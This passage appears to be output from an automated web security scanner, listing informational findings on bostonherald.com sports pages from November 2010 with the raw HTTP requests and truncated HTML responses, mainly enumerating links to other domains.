http://multimedia.heraldinteractive.com/images/20101104/stp/a00fe8_Moss_11042010.jpg
http://multimedia.heraldinteractive.com/images/20101104/stp/e114f9_rmoss11042010.jpg
http://multimedia.heraldinteractive.com/images/20101104/stp/e4c287_bill_11042010.jpg
http://multimedia.heraldinteractive.com/images/20101105/stp/c270fa_light_11052010.jpg
http://multimedia.heraldinteractive.com/images/20101106/stp/1a20eb_Papi_02222009.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/03c8a7_kings.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/481fff_zentya.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/56a07e_Krej_11072010.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/f7e0bc_Time_11072010.jpg
http://multimedia.heraldinteractive.com/images/20101108/bedf5e_kyle_11082010.jpg
http://multimedia.heraldinteractive.com/images/20101108/stp/f0cad3_shake_11082010.jpg
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://twitter.com/bostonherald
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.facebook.com/plugins/activity.php?site=http%253A%252F%252Fbostonherald.com&width=300&height=300&header=true&colorscheme=light&font&border_color
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /sports/columnists/?srvc=home&position=emailed HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:34:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 62507

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>



<link rel="alternate" title="Columnists - Sports - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/sports/columnists/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsports%2Fcolumnists%2F&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_rss_small.gif"> <a class="orange" style="font-weight:bold" href="/rss">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_enews_small.gif"> <a class="orange" style="font-weight:bold" href="/users/register/">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_mobile_small.gif"> <a class="orange" style="font-weight:bold" href="/mobile/info.bg">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_news_tips_small.gif"> <a class="orange" style="font-weight:bold" href="/about/contact/news_tip.bg">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_home_delivery_small.gif"> <a class="orange" style="font-weight:bold" href="/about/home_delivery/">
...[SNIP]...
<a href="/sports/columnists/view/20101108eric_mangini_outdoes_bill_belichick_student_teaches_lesson/"><img src="http://multimedia.heraldinteractive.com/images/20101108/stp/f0cad3_shake_11082010.jpg" alt="PARTING SHOT: Eric Mangini shakes hands with Bill Belichick after his Browns hammered the Patriots, 34-14, yesterday in Cleveland.

"></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Comments"><a href="/sports/columnists/view/20101108eric_mangini_outdoes_bill_belichick_student_teaches_lesson/srvc=sco&position=">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniPoll.gif" alt="Comments"><a href="/sports/columnists/view/20101108eric_mangini_outdoes_bill_belichick_student_teaches_lesson/srvc=sco&position=">
...[SNIP]...
<a href="/sports/columnists/view/20101107patriots_need_full_60-minute_game_a_story_of_the_halves_and_half-nots/"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/f7e0bc_Time_11072010.jpg" alt="CLOCK IS TICKING: While the Pats have made improvements over last year, showing stronger play in the second half, they know they must soon put together complete, 60-minute games if they are to realize their championship aspirations."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniPoll.gif" alt="Poll"><a href="/sports/columnists/view/20101107patriots_need_full_60-minute_game_a_story_of_the_halves_and_half-nots/srvc=sco&position=">
...[SNIP]...
<a href="/sports/columnists/view/20101107crushing_hit_on_david_krejci_puts_loss_in_perspective/"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/56a07e_Krej_11072010.jpg" alt="ALL TOO FAMILIAR SIGHT: Bruins captain Zdeno Chara and Andrew Ference assist David Krejci to the locker room after a hard hit by the Blues’ T.J. Oshie in last night’s game at the Garden."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery"><a href="/sports/columnists/view/20101107crushing_hit_on_david_krejci_puts_loss_in_perspective/srvc=sco&position=">
...[SNIP]...
<a href="/sports/columnists/view/20101107hot_kings_are_turning_heads/"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/03c8a7_kings.jpg" alt="Tampa Bay Lightning center Mattias Ritola, right, of Sweden jumps as he battles for the puck with Los Angeles Kings right wing Dustin Brown during the second period of an NHL hockey game Thursday, in Los Angeles."></a>
...[SNIP]...
<a href="/sports/columnists/view/20101107zenyatta_loses_nothing_in_losing_perfection/"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/481fff_zentya.jpg" alt="Garrett Gomez, right, rides Blame to victory during the Classic race at the Breeder’s Cup horse races at Churchill Downs Saturday, in Louisville, Ky. Mike Smith riding Zenyatta finished second."></a>
...[SNIP]...
<a href="/sports/columnists/view/20101106david_ortiz_chance_to_be_big_papi/"><img src="http://multimedia.heraldinteractive.com/images/20101106/stp/1a20eb_Papi_02222009.jpg" alt="CAP YEAR: By picking up David Ortiz’ option for 2011, the Sox gave their DH another chance to prove his worth to the team on and off the field."></a>
...[SNIP]...
<a href="/sports/columnists/view/20101105charity_event_shows_patriots_bonds_light_reminder_of_unity/"><img src="http://multimedia.heraldinteractive.com/images/20101105/stp/c270fa_light_11052010.jpg" alt="TWO GOOD: Quarterback Tom Brady has Matt Light’s back as the two get loose before practice yesterday in Foxboro.

"></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniPoll.gif" alt="Poll"><a href="/sports/columnists/view/20101105charity_event_shows_patriots_bonds_light_reminder_of_unity/srvc=sco&position=">
...[SNIP]...
<a href="/sports/columnists/view/20101104moving_tribute_to_bill_belichick_tricks_of_trade_not_lost_on_him/"><img src="http://multimedia.heraldinteractive.com/images/20101104/stp/a00fe8_Moss_11042010.jpg" alt="REMEMBER THIS TITAN: Randy Moss was claimed yesterday by Tennessee, ending any chance of him winding up back with the Patriots this season."></a>
...[SNIP]...
<a href="/sports/columnists/view/20101104bill_belichick_works_his_magic_genius_makes_a_return/"><img src="http://multimedia.heraldinteractive.com/images/20101104/stp/e4c287_bill_11042010.jpg" alt="Bill Belichick."></a>
...[SNIP]...
<a href="/sports/columnists/view/20101104work_habits_not_tirade_cost_randy_moss/"><img src="http://multimedia.heraldinteractive.com/images/20101104/stp/e114f9_rmoss11042010.jpg" alt="Minnesota Randy Moss (84) is shown on the sidelines during game the Vikings football game against the New York Jets at The New Meadowlands Stadium in East Rutherford, New Jersey, Monday, October 11, 2010."></a>
...[SNIP]...
<a href="/sports/columnists/view/20101102when_it_comes_to_randy_moss_i_have_answers_ask_and_ye_shall_receive/"><img src="http://multimedia.heraldinteractive.com/images/20101101/stp/73ce75_randymoss_11022010.jpg" alt="TRICKS OF THE TRADE: Randy Moss smiles during Sunday’s game at Gillette Stadium, which may have been his last as a Minnesota Viking.

"></a>
...[SNIP]...
<a href="/sports/football/patriots/view.bg?articleid=1294816"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20101108/bedf5e_kyle_11082010.jpg"></a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div style="display:none;">
<iframe src="http://www.facebook.com/plugins/activity.php?site=http%253A%252F%252Fbostonherald.com&width=300&height=300&header=true&colorscheme=light&font&border_color" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:300px; height:300px;" allowTransparency="true"></iframe>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<br/>
No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

8.46. http://bostonherald.com/sports/columnists/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/sports/columnists/view.bg

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/sports/columnists/view.bg?articleid=1294689&srvc=home&position=emailed

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsports%2Fcolumnists%2Fview.bg%3Farticleid%3D1294689%26position%3Demailed&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif
http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/sports/columnists/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://multimedia.heraldinteractive.com/images/20101106/stp/465974_zenyatta2_11072010.jpg
http://multimedia.heraldinteractive.com/images/20101107/481fff_zentya.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/ddb901_Gray_11072010.jpg
http://multimedia.heraldinteractive.com/images/20101108/stp/c2266a_zen_11082010.jpg
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://s7.addthis.com/js/200/addthis_widget.js
http://twitter.com/bostonherald
http://www.addthis.com/bookmark.php?v=20
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ

Request

GET /sports/columnists/view.bg?articleid=1294689&srvc=home&position=emailed HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:34:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 43462

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsports%2Fcolumnists%2Fview.bg%3Farticleid%3D1294689%26position%3Demailed&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Zenyatta loses nothing in losing perfection');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<a href="/sports/columnists/view.bg?articleid=1294689&format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />(3) Comments  |  Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:block">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif"> <b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="trackPhotoGalleryPicArea"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20101107/481fff_zentya.jpg" alt="Garrett Gomez, right, rides Blame to..." /></div>
...[SNIP]...
<a href="/sports/other_sports/horse_racing/view/20101108zenyattas_no_loser_despite_finishing_2nd/"><img src="http://multimedia.heraldinteractive.com/images/20101108/stp/c2266a_zen_11082010.jpg" alt="Zenyatta’s no loser despite finishing 2nd" /></a>
...[SNIP]...
<a href="/sports/other_sports/horse_racing/view/20101107imperfect_end_for_zenyatta_ladys_unlucky/"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/ddb901_Gray_11072010.jpg" alt="Imperfect end for Zenyatta" /></a>
...[SNIP]...
<a href="/sports/other_sports/horse_racing/view/20101106zenyatta_falls_short_in_quest_for_perfection/"><img src="http://multimedia.heraldinteractive.com/images/20101106/stp/465974_zenyatta2_11072010.jpg" alt="Zenyatta falls short in quest for perfection" /></a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsports%2Fcolumnists%2Fview.bg%3Farticleid%3D1294689%26position%3Demailed&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

8.47. http://bostonherald.com/sports/football/patriots/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/sports/football/patriots/view.bg

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/sports/football/patriots/view.bg?articleid=1294646&format=comments&srvc=home&position=active

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsports%2Ffootball%2Fpatriots%2Fview%2F20101107just_as_he_drew_it_up_bledsoes_post-career_planning_a_big_success_thanks_to_family_and_businesses_worth_toasting%2Fformat%3Dcomments%26srvc%3Dhome%26position%3D4&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png
http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif
http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif
http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png
http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png
http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png
http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png
http://cache.heraldinteractive.com/images/siteImages/reporters/ron_borges.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/sports/football/patriots/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://multimedia.heraldinteractive.com/images/20101104/stp/0e0056_dan_11042010.jpg
http://multimedia.heraldinteractive.com/images/20101105/stp/a857bc_ltppryor20101105.jpg
http://multimedia.heraldinteractive.com/images/20101107/c38bb9_Drew_11072010.jpg
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://s7.addthis.com/js/200/addthis_widget.js
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/team.aspx?id=077
http://twitter.com/bostonherald
http://www.addthis.com/bookmark.php?v=20
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ

Request

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:24:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 91545

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsports%2Ffootball%2Fpatriots%2Fview%2F20101107just_as_he_drew_it_up_bledsoes_post-career_planning_a_big_success_thanks_to_family_and_businesses_worth_toasting%2Fformat%3Dcomments%26srvc%3Dhome%26position%3D4&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Just as he Drew it up');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<font color="#888888"> [<a href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/team.aspx?id=077" >team stats</a>
...[SNIP]...

